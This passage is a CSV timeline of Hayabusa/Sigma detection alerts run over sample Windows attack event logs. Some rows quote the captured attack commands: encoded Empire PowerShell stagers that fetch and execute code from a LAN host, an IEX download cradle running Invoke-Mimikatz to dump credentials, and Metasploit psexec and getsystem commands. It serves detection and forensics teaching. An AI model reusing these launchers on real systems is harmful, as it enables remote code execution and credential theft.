WwBTAFkAUwB0AEUAbQAuAE4ARQBUAC4AUwBFAHIAdgBJAEMAZQBQAG8AaQBOAFQATQBBAE4AYQBHAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8AbgBUAGkAbgB1AEUAIAA9ACAAMAA7ACQAVwBjAD0ATgBlAHcALQBPAGIASgBlAGMAVAAgAFMAWQBTAHQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwAaQBFAE4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgARQBBAEQAZQBSAHMALgBBAGQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAcgBPAHgAeQAgAD0AIABbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBXAEUAQgBSAGUAcQB1AEUAUwB0AF0AOgA6AEQAZQBmAGEAdQBMAFQAVwBlAEIAUABSAG8AeAB5ADsAJABXAGMALgBQAFIATwB4AFkALgBDAFIARQBEAGUATgBUAEkAYQBMAHMAIAA9ACAAWwBTAFkAcwBUAEUAbQAuAE4AZQB0AC4AQwByAGUARABlAG4AdABJAEEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQBVAEwAVABOAGUAVAB3AG8AcgBrAEMAcgBFAEQAZQBuAFQASQBhAEwAcwA7ACQASwA9ACcAcwB5AHwAUgA0AFgAaABCAFcAbwB6AEsALgB4AC0ANgArADkAPgBJAGkAcQA3AEQAOABgAEoATABuAGwAdwBWACcAOwAkAEkAPQAwADsAWwBDAEgAYQBSAFsAXQBdACQAQgA9ACgAWwBDAGgAQQBSAFsAXQBdACgAJAB3AGMALgBEAE8AdwBuAGwAbwBhAEQAUwBUAHIASQBOAEcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAOQA4AC4AMQA0ADkAOgA4ADAAOAAwAC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF8ALQBCAFgATwBSACQAawBbACQAaQArACsAJQAkAGsALgBMAGUAbgBnAHQAaABdAH0AOwBJAEUAWAAgACgAJABCAC0ASgBPAEkATgAnACcAKQA= | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe68 | User: IEUser | LID: 0x6793c,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:54.128 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x480 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:54.128 +00:00,IE10Win7,4688,medium,Exec,Suspicious Execution of Powershell with Base64,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_encode.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:54.128 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:54.128 +00:00,IE10Win7,4688,critical,Exec,Empire PowerShell Launch Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_empire_launch.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:15:54.128 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:22.128 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.543 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.575 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x160 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.637 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x98c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.903 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc JABXAGMAPQBOAGUAdwAtAE8AQgBKAEUAQwBUACAAUwB5AFMAdABFAG0ALgBOAEUAVAAuAFcAZQBCAEMAbABJAGUATgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBDAC4ASABlAGEAZABFAHIAUwAuAEEAZABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AWABZACAAPQAgAFsAUwBZAFMAVABFAG0ALgBOAGUAdAAuAFcAZQBiAFIARQBxAHUAZQBzAHQAXQA6ADoARABFAGYAQQB1AGwAdABXAGUAYgBQAFIATwBYAHkAOwAkAHcAQwAuAFAAcgBvAFgAeQAuAEMAcgBlAGQARQBOAFQASQBBAEwAUwAgAD0AIABbAFMAWQBzAFQAZQBNAC4ATgBlAFQALgBDAFIAZQBEAGUAbgB0AGkAQQBMAEMAQQBjAGgAZQBdADoAOgBEAGUARgBBAFUAbAB0AE4AZQB0AHcAbwByAEsAQwBSAEUAZABlAG4AVABJAGEAbABTADsAJABLAD0AJwApADAAZABoAEMAeQAxAEoAOQBzADMAcQBZAEAAJQBMACEANwBwAHUAXQBUAHwAdgBWAH0AdABuAFsAQQBRAFIAJwA7ACQAaQA9ADAAOwBbAEMASABBAHIAWwBdAF0AJABCAD0AKABbAGMASABhAHIAWwBdAF0AKAAkAFcAYwAuAEQAbwB3AG4ATABvAGEARABTAHQAUgBpAG4ARwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQA5ADgALgAxADQAOQA6ADgAMAA4ADIALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAGIAWABPAHIAJABLAFsAJABJACsAKwAlACQASwAuAEwARQBuAEcAdABoAF0AfQA7AEkARQBYACAAKAAkAEIALQBqAG8AaQBOACcAJwApAA== | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x11c | User: IEUser | LID: 0x6793c,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.903 +00:00,IE10Win7,4688,high,Exec,Suspicious Encoded PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_enc_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.903 +00:00,IE10Win7,4688,medium,Exec,Suspicious Execution of Powershell with Base64,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_encode.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.903 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.903 +00:00,IE10Win7,4688,medium,,Base64 Encoded Command Line Param Indicator,,rules/sigma/process_creation_builtin/proc_creation_win_susp_base64_cmdline_param.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.903 +00:00,IE10Win7,4688,critical,Exec,Empire PowerShell Launch Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_empire_launch.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.903 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:19:26.918 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7d0 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:20:19.153 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc50 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:20:19.153 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:20:20.465 +00:00,IE10Win7,4688,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_builtin/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:20:20.465 +00:00,IE10Win7,4688,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation_builtin/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-20 19:20:20.465 +00:00,IE10Win7,4688,medium,Disc,Whoami Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 03:40:37.088 +00:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 03:40:41.865 +00:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 03:41:02.542 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 03:41:02.542 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 03:41:02.542 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 03:41:02.568 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 03:41:02.568 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 03:41:02.568 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 03:41:13.070 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 03:41:13.070 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 03:41:13.070 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 03:41:13.078 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 03:41:13.078 +00:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 03:41:13.078 +00:00,IE10Win7,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2017-06-09 19:21:26.968 +00:00,2016dc.hqcorp.local,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx +2017-06-12 23:39:43.512 +00:00,2012r2srv.maincorp.local,4765,medium,Persis | PrivEsc,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx +2017-08-30 16:31:49.876 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:31:49.908 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:31:57.382 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:31:57.382 +00:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:31:57.382 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:31:57.382 +00:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:31:57.382 +00:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:31:57.382 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:32:05.661 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:32:07.371 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:32:13.803 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:32:13.803 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:32:13.804 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:32:13.804 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:32:14.325 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:33:28.096 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:33:34.598 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:33:34.600 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:33:34.601 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:33:35.043 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:38:42.201 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[3].""#text""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:38:42.204 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:38:45.375 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[4].""#text""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:38:45.376 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:38:48.413 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[5].""#text""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:38:48.416 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:38:51.394 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[6].""#text""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:38:51.396 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:17.974 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:20.563 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" 